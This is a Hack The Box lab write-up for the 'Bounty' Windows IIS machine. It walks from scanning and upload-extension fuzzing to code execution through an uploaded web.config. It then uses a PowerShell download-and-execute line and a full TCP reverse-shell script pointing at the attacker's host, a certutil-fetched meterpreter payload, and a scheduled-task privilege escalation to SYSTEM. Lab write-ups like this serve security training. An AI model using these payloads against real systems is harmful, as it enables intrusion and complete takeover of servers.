Bounty

From Luniwiki
Jump to: navigation, search

Back

Bounty01.png


Ports scan

masscan found only port 80

root@kali:~/HTB/Machines/Bounty# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.93 --rate=1000

Starting masscan 1.0.5 at 2019-11-30 14:50:52 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.93

nmap

root@kali:~/HTB/Machines/Bounty# nmap -sC -sV 10.10.10.93
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-30 19:02 EST
Nmap scan report for bounty.htb (10.10.10.93)
Host is up (0.044s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds

IIS 7.5 was included in Windows 7 and Windows Server 2008 R2.

Web enumeration

Main page

Bounty02.png

root@kali:~/HTB/Machines/Bounty# curl -v http://10.10.10.93/
*   Trying 10.10.10.93:80...
* TCP_NODELAY set
* Connected to 10.10.10.93 (10.10.10.93) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.93
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: text/html
< Last-Modified: Thu, 31 May 2018 03:46:26 GMT
< Accept-Ranges: bytes
< ETag: "20ba8ef391f8d31:0"
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Sun, 01 Dec 2019 00:32:01 GMT
< Content-Length: 630
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bounty</title>
<style type="text/css">
<!--
body {
        color:#000000;
        background-color:#B3B3B3;
        margin:0;
}

#container { margin-left:auto; margin-right:auto; text-align:center; }
a img { border:none; }
--> </style> </head> <body> <div id="container"> <a href=""><img src="merlin.jpg" alt="IIS7" width="571" height="411" /></a> </div> </body> * Connection #0 to host 10.10.10.93 left intact </html>

The image doesn't give more information.

root@kali:~/HTB/Machines/Bounty# wget http://bounty.htb/merlin.jpg
--2019-11-30 10:08:28--  http://bounty.htb/merlin.jpg
Resolving bounty.htb (bounty.htb)... 10.10.10.93
Connecting to bounty.htb (bounty.htb)|10.10.10.93|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 780732 (762K) [image/jpeg]
Saving to: ‘merlin.jpg’

merlin.jpg 100%[===================>] 762.43K 1.69MB/s in 0.4s
2019-11-30 10:08:28 (1.69 MB/s) - ‘merlin.jpg’ saved [780732/780732] root@kali:~/HTB/Machines/Bounty# strings merlin.jpg

Dirsearch

The first search only with extensions txt and folders and big file to find the structure.

root@kali:~/HTB/Machines/Bounty# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt" -f -t 1000 -u http://10.10.10.93
 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: txt | HTTP method: get | Threads: 1000 | Wordlist size: 441041
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-30_10-20-05.log
Target: http://10.10.10.93
[10:20:05] Starting: [10:21:42] 403 - 1KB - /UploadedFiles/ [10:22:00] 403 - 1KB - /uploadedFiles/ [10:23:23] 403 - 1KB - /uploadedfiles/
Task Completed

There is a folder uploadedfiles. The second iteration with more extensions, but smaller file.

root@kali:~/HTB/Machines/Bounty# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e "php,asp,aspx,js" -f -t 1000 -u http://10.10.10.93
 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, js | HTTP method: get | Threads: 1000 | Wordlist size: 438229
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-30_10-35-30.log
Target: http://10.10.10.93
[10:35:30] Starting: [10:36:06] 200 - 974B - /transfer.aspx [10:36:29] 400 - 11B - /%2Acheckout%2A.aspx [10:37:28] 400 - 11B - /%2Adocroot%2A.aspx [10:37:46] 400 - 11B - /%2A.aspx [10:38:12] 400 - 11B - /http%3A%2F%2Fwww.aspx [10:39:04] 400 - 11B - /q%26a.aspx [10:39:06] 400 - 11B - /http%3A.aspx [10:39:49] 400 - 11B - /%2A%2Ahttp%3a.aspx [10:39:56] 403 - 1KB - /UploadedFiles/ [10:40:25] 403 - 1KB - /uploadedFiles/ [10:41:27] 400 - 11B - /%2Ahttp%3A.aspx [10:42:39] 400 - 11B - /%2A%2Ahttp%3A.aspx [10:42:54] 403 - 1KB - /uploadedfiles/ [10:43:20] 400 - 11B - /http%3A%2F%2Fyoutube.aspx [10:43:21] 400 - 11B - /http%3A%2F%2Fblogs.aspx [10:43:22] 400 - 11B - /http%3A%2F%2Fblog.aspx [10:44:44] 400 - 11B - /%2A%2Ahttp%3A%2F%2Fwww.aspx
Task Completed

File upload

The transfer.aspx shows a form to upload files.

Bounty03.png

We do a test with a gif file.

Bounty04.png

The file is uploaded successfully.

Bounty05.png

We find the file at the URI /uploadedfiles/test.gif

Bounty06.png

We try to upload an aspx file.

root@kali:~/HTB/Machines/Bounty# echo test > test.aspx

Bounty07.png

But as expected, this extension is not allowed.

Bounty08.png

Determine allowed extensions

The web page https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN provide the list of file extensions managed by IIS7.

Bounty09.png

root@kali:~/HTB/Machines/Bounty# curl -q "https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN" 2>/dev/null | grep "<td><p>\..*</p></td>" | cut -d '>' -f 3 | cut -d '<' -f 1 | sed 's/, /\n/g' | cut -c 2- > extensions.lst
root@kali:~/HTB/Machines/Bounty# cat extensions.lst
asax
ascx
ashx
asmx
aspx
axd
browser
cd
compile
config
cs
vb
csproj
vbproj
disco
vsdisco
dsdgm
dsprototype
dll
licx
webinfo
master
mdb
ldb
mdf
msgx
svc
resources
resx
sdm
sdmDocument
sitemap
skin
sln
soap
asa
cdx
cer
idc
shtm
shtml
stm
css
htm
html
jpg
jpeg
png
tiff
bmp
svg
gif
ico
tga
xcf
dwg
pdf
root@kali:~/HTB/Machines/Bounty# echo test > test.txt

We upload a test file.

Bounty10.png

We intercept the request, and we send it to Intruder module.

Bounty11.png

Clear the fields, and select the file extension as payload.

Bounty12.png

Load the extensions as payload from file.

Bounty14.png

Fetch results that are between ''<span id="Label1" style="color:'' and ''</span>''

Bounty13.png

Run the attack, and we can see the text "File Uploaded successfully." from admitted extensions.

Bounty15.png

Order the results by successful extensions.

Bounty16.png

We can update file with these extensions:

  • config
  • jpg
  • jpeg
  • png
  • gif

RCE with web.config

Soroush Dalili's article explains how to execute remote code from a web.config page.

Test

root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(3+4)
Response.write("<!-"&"-")
%>
-->

Bounty17.png

Bounty18.png

The code is executed, because it executed the command, and printed 7 not 3+4.

Execute systeminfo

root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> 
</requestFiltering> </security> </system.webServer> </configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
 <%
 Response.write("-"&"->")
 ' it is running the ASP code if you can see 3 by opening the web.config file!
 Response.write("<pre>")
 Set wShell1 = CreateObject("WScript.Shell")
 Set cmd1 = wShell1.Exec("cmd /c systeminfo")
 output1 = cmd1.StdOut.Readall()
 Response.write(output1)
 Response.write("</pre><!-"&"-")
 %>
 -->

Bounty19.png

Gain a reverse shell

root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> 
</requestFiltering> </security> </system.webServer> </configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
 <%
 Response.write("-"&"->")
 ' it is running the ASP code if you can see 3 by opening the web.config file!
 Response.write("<pre>")
 Set wShell1 = CreateObject("WScript.Shell")
 Set cmd1 = wShell1.Exec("cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.34/rs.ps1')")
 output1 = cmd1.StdOut.Readall()
 Response.write(output1)
 Response.write("</pre><!-"&"-")
 %>
 -->

The web.config will download the file rs.ps1 and execute it.

root@kali:~/HTB/Machines/Bounty# cat rs.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.34',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Open the web server

root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Open the listener

root@kali:~/HTB/Machines/Bounty# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Browse the URL

Bounty20.png

The file rs.ps1 is downloaded

root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.93 - - [02/Dec/2019 00:37:54] "GET /rs.ps1 HTTP/1.1" 200 -

And a reverse powershell is opened at the same moment.

root@kali:~/HTB/Machines/Bounty# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.93.
Ncat: Connection from 10.10.10.93:49158.
whoami
bounty\merlin
PS C:\windows\system32\inetsrv>

User flag

PS C:\windows\system32\inetsrv> cd C:\
PS C:\> cd Users\merlin\Desktop
PS C:\Users\merlin\Desktop> cat user.txt
<USER_FLAG>

User escalation

Reverse meterpreter

Create the reverse meterpreter.

root@kali:~/HTB/Machines/Bounty# msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.34 LPORT=5555 -f exe -o metasploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 206403 bytes
Final size of exe file: 212992 bytes
Saved as: metasploit.exe

Check if the web server is listening. And launch the command certutl to upload the file.

PS C:\windows\system32\inetsrv> cd c:\users\merlin
PS C:\users\merlin> certutil -urlcache -split -f "http://10.10.14.34/metasploit.exe" metasploit.exe
****  Online  ****
 000000  ...
 034000
CertUtil: -URLCache command completed successfully.

The web server registers the upload twice.

root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.93 - - [02/Dec/2019 00:37:54] "GET /rs.ps1 HTTP/1.1" 200 -
10.10.10.93 - - [03/Dec/2019 10:54:38] "GET /metasploit.exe HTTP/1.1" 200 -
10.10.10.93 - - [03/Dec/2019 10:54:39] "GET /metasploit.exe HTTP/1.1" 200 -

Run the metasploit console, and run the listener on port 5555

root@kali:~/HTB/Machines/Bounty# msfconsole
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.34
LHOST => 10.10.14.34
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.34:5555

Start the reverse meterpreter.

PS C:\users\merlin> cmd /c metasploit.exe

And the meterpreter opens

[*] Sending stage (180291 bytes) to 10.10.10.93
[*] Meterpreter session 1 opened (10.10.14.34:5555 -> 10.10.10.93:49171) at 2019-12-03 11:20:35 -0500

meterpreter > getuid Server username: BOUNTY\merlin

Exploit to escalate

The meterpreter is opened as merlin, now we need to escalate.

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester

Matching Modules ================
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.93 - Collecting local exploits for x64/windows... [*] 10.10.10.93 - 13 exploit checks are being tried... [+] 10.10.10.93 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable. [+] 10.10.10.93 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable. [+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable. [+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [*] Post module execution completed msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator msf5 exploit(windows/local/ms10_092_schelevator) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.14.34 LHOST => 10.10.14.34 msf5 exploit(windows/local/ms10_092_schelevator) > set LPORT 6666 LPORT => 6666 msf5 exploit(windows/local/ms10_092_schelevator) > run
[*] Started reverse TCP handler on 10.10.14.34:6666 [*] Preparing payload at C:\Windows\TEMP\TKeIxip.exe [*] Creating task: RT4ADIUWBKw89 [*] SUCCESS: The scheduled task "RT4ADIUWBKw89" has successfully been created. [*] SCHELEVATOR [*] Reading the task file contents from C:\Windows\system32\tasks\RT4ADIUWBKw89... [*] Original CRC32: 0xfc4dee90 [*] Final CRC32: 0xfc4dee90 [*] Writing our modified content back... [*] Validating task: RT4ADIUWBKw89 [*] [*] Folder: \ [*] TaskName Next Run Time Status [*] ======================================== ====================== =============== [*] RT4ADIUWBKw89 1/1/2020 8:47:00 AM Ready [*] SCHELEVATOR [*] Disabling the task... [*] SUCCESS: The parameters of scheduled task "RT4ADIUWBKw89" have been changed. [*] SCHELEVATOR [*] Enabling the task... [*] SUCCESS: The parameters of scheduled task "RT4ADIUWBKw89" have been changed. [*] SCHELEVATOR [*] Executing the task... [*] Sending stage (180291 bytes) to 10.10.10.93 [*] SUCCESS: Attempted to run the scheduled task "RT4ADIUWBKw89". [*] SCHELEVATOR [*] Deleting the task... [*] Meterpreter session 2 opened (10.10.14.34:6666 -> 10.10.10.93:49163) at 2019-12-02 01:47:08 -0500 [*] SUCCESS: The scheduled task "RT4ADIUWBKw89" was successfully deleted. [*] SCHELEVATOR
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

The host is vulnerable to a lot of exploits (because is not patched). I stopped after 3 exploits.

msf5 exploit(windows/local/ms16_075_reflection_juicy) > sessions

Active sessions ===============
Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows BOUNTY\merlin @ BOUNTY 10.10.14.34:5555 -> 10.10.10.93:49161 (10.10.10.93) 2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ BOUNTY 10.10.14.34:6666 -> 10.10.10.93:49163 (10.10.10.93) 3 shell x64/windows Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation... 10.10.14.34:7777 -> 10.10.10.93:49165 (10.10.10.93) 4 meterpreter x86/windows NT AUTHORITY\SYSTEM @ BOUNTY 10.10.14.34:8888 -> 10.10.10.93:49183 (10.10.10.93)

Root Flag

meterpreter > shell
Process 284 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Users cd C:\Users
C:\Users>cd Administrator cd Administrator
C:\Users\Administrator>cd Desktop cd Desktop
C:\Users\Administrator\Desktop>type root.txt type root.txt <ROOT_FLAG>

References

Daniel Simao 18:53, 30 November 2019 (EST)